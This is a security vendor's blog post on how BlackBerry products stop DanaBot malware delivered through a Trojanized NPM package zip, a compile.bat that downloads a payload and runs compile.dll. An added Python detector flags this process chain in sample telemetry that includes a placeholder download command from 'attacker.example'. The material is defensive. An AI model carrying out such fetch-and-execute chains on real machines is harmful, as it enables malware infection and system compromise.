BlackBerry Prevents: DanaBot Malware

DanaBot is an ever-evolving and prevalent threat that has been in the wild since 2018. The malware saw a resurgence in late 2021 after it was found several times in hijacked packages distributed through the Node Package Manager (NPM), the popular package manager for Node.js.

Sold as a Malware-as-a-Service (MaaS) offering, DanaBot initially focused on banking fraud and information stealing. However, over the years it has matured in complexity and grown in functionality. One such functional shift was seen in late October 2021, when an affiliate using the malware dropped via the hijacked NPM packages was involved in a distributed denial-of-service (DDoS) attack against a commercial organization based in Russia.

To see how BlackBerry prevents DanaBot attacks from occurring, check out the following video, and watch BlackBerry go head-to-head with a live sample of DanaBot malware.  

DEMO VIDEO: BlackBerry vs. DanaBot MaaS  

Demo Video: Step by Step

In this video, we demonstrate how DanaBot compromises a system. For the purposes of this demonstration, we have configured our machine in Audit-Only mode to allow for malware execution.

Here’s how things normally play out. The would-be victim downloads what appears to be the RC package, a popular NPM component, delivered as a .zip file. Typically it is downloaded from a malicious website offering a “cracked,” or free, version of the component.

But nothing good in life ever comes for free. The cracked version is Trojanized, bundled with DanaBot executables.

Upon extraction of the .zip file’s contents, an installation script called “compile.bat” initiates the DanaBot installation and attempts to download the malicious payload from a command-line window. Once the download completes, the script executes the compile.dll file, which compromises the system and puts it into the hands of whichever threat actor has purchased the DanaBot Malware-as-a-Service.

How BlackBerry Stops DanaBot

Let’s investigate this incident with two key BlackBerry® solutions: BlackBerry® Protect and BlackBerry® Optics. BlackBerry Protect is an endpoint protection product that uses our Cylance® AI machine learning model to provide pre-execution protection, stopping threats before they can run. In this case, it stops the malicious DLL before it can compromise the system.

BlackBerry Protect also provides full details on the malicious file’s properties, with an exhaustive list of threat indicators identifying anomalies, collection, and destruction capabilities.

BlackBerry Optics gives you full transparency into the attempted system compromise. With BlackBerry Optics, you can conduct automated root-cause analysis where you can clearly see the chain of activities conducted by the user — from the web browser used to access and download the malicious .zip file, to the installation script execution. You can also see the system components used to download and register the malicious DLL into the system.
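The chain described above (a batch script run from a user’s download folder, a download attempt from a command-line window, then execution of a DLL sitting next to the script) is something a defender can reconstruct from ordinary process telemetry. The following Python is an added example and is not BlackBerry code or part of the original post: it models a Sysmon-like stream of process-creation events, rebuilds the parent/child tree, and flags the pattern. The event schema, the sample events, and the names browser.exe, downloader.exe, dll_loader.exe and attacker.example are all constructed placeholders; only the file names compile.bat and compile.dll come from the post, and the component that actually executes the DLL is not named there.

```python
"""Reconstruct the process chain behind a Trojanized-archive installer and flag the
DanaBot-style pattern: a batch script launched from a user directory whose descendants
first fetch something from a URL and then execute a DLL from the script's own folder.

Added example, not BlackBerry code. ProcEvent is a constructed, Sysmon-like schema;
all sample events are made up (browser.exe, downloader.exe, dll_loader.exe and
attacker.example are placeholders). Only compile.bat / compile.dll are from the post.
"""
import re
from collections import deque
from dataclasses import dataclass
from typing import Dict, List


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # executable file name as recorded by the sensor
    cmdline: str    # full command line as recorded by the sensor


URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
BAT_RE = re.compile(r'"?([A-Za-z]:\\[^"]*?\.bat)"?', re.IGNORECASE)
DLL_RE = re.compile(r'([A-Za-z]:\\[^"\s,]*?\.dll)', re.IGNORECASE)
USER_DIR_RE = re.compile(r"^[A-Za-z]:\\Users\\", re.IGNORECASE)   # user-writable location


def _dir_of(path: str) -> str:
    """Directory part of a Windows path, lower-cased so paths compare case-insensitively."""
    return path.rsplit("\\", 1)[0].lower()


def _ancestry(pid: int, by_pid: Dict[int, ProcEvent]) -> List[str]:
    """Image names from the outermost recorded ancestor down to the given process."""
    chain = []
    while pid in by_pid:
        chain.append(by_pid[pid].image)
        pid = by_pid[pid].ppid
    return list(reversed(chain))


def _descendants(pid: int, children: Dict[int, List[ProcEvent]]) -> List[ProcEvent]:
    """Breadth-first list of every process spawned (directly or indirectly) by pid."""
    out, queue = [], deque(children.get(pid, []))
    while queue:
        e = queue.popleft()
        out.append(e)
        queue.extend(children.get(e.pid, []))
    return out


def find_chains(events: List[ProcEvent]) -> List[dict]:
    """Return one finding per batch script that both downloaded and ran a sibling DLL."""
    by_pid = {e.pid: e for e in events}
    children: Dict[int, List[ProcEvent]] = {}
    for e in events:
        children.setdefault(e.ppid, []).append(e)

    findings = []
    for e in events:
        if e.image.lower() != "cmd.exe":
            continue
        m = BAT_RE.search(e.cmdline)
        if not m or not USER_DIR_RE.match(m.group(1)):
            continue                      # not a .bat, or not run from a user directory
        script_dir = _dir_of(m.group(1))
        download = dll_exec = None
        for d in _descendants(e.pid, children):
            if download is None and URL_RE.search(d.cmdline):
                download = d              # stage 1: fetch from the network
            dm = DLL_RE.search(d.cmdline)
            if dll_exec is None and dm and _dir_of(dm.group(1)) == script_dir:
                dll_exec = d              # stage 2: run a DLL that sits beside the script
        if download and dll_exec:
            findings.append({
                "script_pid": e.pid, "script": m.group(1),
                "download_pid": download.pid, "download_cmd": download.cmdline,
                "dll_exec_pid": dll_exec.pid, "dll": DLL_RE.search(dll_exec.cmdline).group(1),
                "ancestry": _ancestry(e.pid, by_pid),
            })
    return findings


# Constructed sample telemetry. The first tree mirrors the post's chain; the second is a
# developer's build script that touches no URL and only a system DLL, so it must not fire.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, "explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, "browser.exe", "browser.exe"),                              # placeholder browser
    ProcEvent(300, 100, "cmd.exe", r'cmd.exe /c "C:\Users\victim\Downloads\rc\compile.bat"'),
    ProcEvent(400, 300, "downloader.exe", r"downloader.exe https://attacker.example/payload"),
    ProcEvent(500, 300, "dll_loader.exe", r"dll_loader.exe C:\Users\victim\Downloads\rc\compile.dll,Entry"),
    ProcEvent(600, 100, "cmd.exe", r'cmd.exe /c "C:\Users\dev\proj\build.bat"'),
    ProcEvent(700, 600, "dll_loader.exe", r"dll_loader.exe C:\Windows\System32\foo.dll"),
]

if __name__ == "__main__":
    for f in find_chains(SAMPLE_EVENTS):
        print(" -> ".join(f["ancestry"]), "|", f["script"])
        print("   download:", f["download_cmd"])
        print("   dll exec:", f["dll"])
```

Requiring both stages under the same script keeps a developer’s build.bat, or a script that only fetches an update, from firing; the ancestry list is the same parent chain an analyst would follow backwards during root-cause analysis.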

Using BlackBerry Optics, you can identify the source domain for this attack and visualize all the related network interactions.

A third product, BlackBerry® Gateway, can sense and stop this type of malicious network activity by blocking the traffic based on IP reputation, effectively preventing the installation script from retrieving the malicious payload from the Internet. Using BlackBerry Gateway, the administrator of the affected system can quickly look into the event and obtain all the relevant data they need to see where the attack came from, and why BlackBerry products intervened to stop the attack before it began.

Our Prevention-First Philosophy   

At BlackBerry, we take a prevention-first and AI-driven approach to cybersecurity. Putting prevention first neutralizes malware before the exploitation stage of the kill chain.   

By stopping malware at this stage, BlackBerry solutions help organizations increase their resilience. This approach also reduces infrastructure complexity and streamlines security management, ensuring your business, people and endpoints are secure.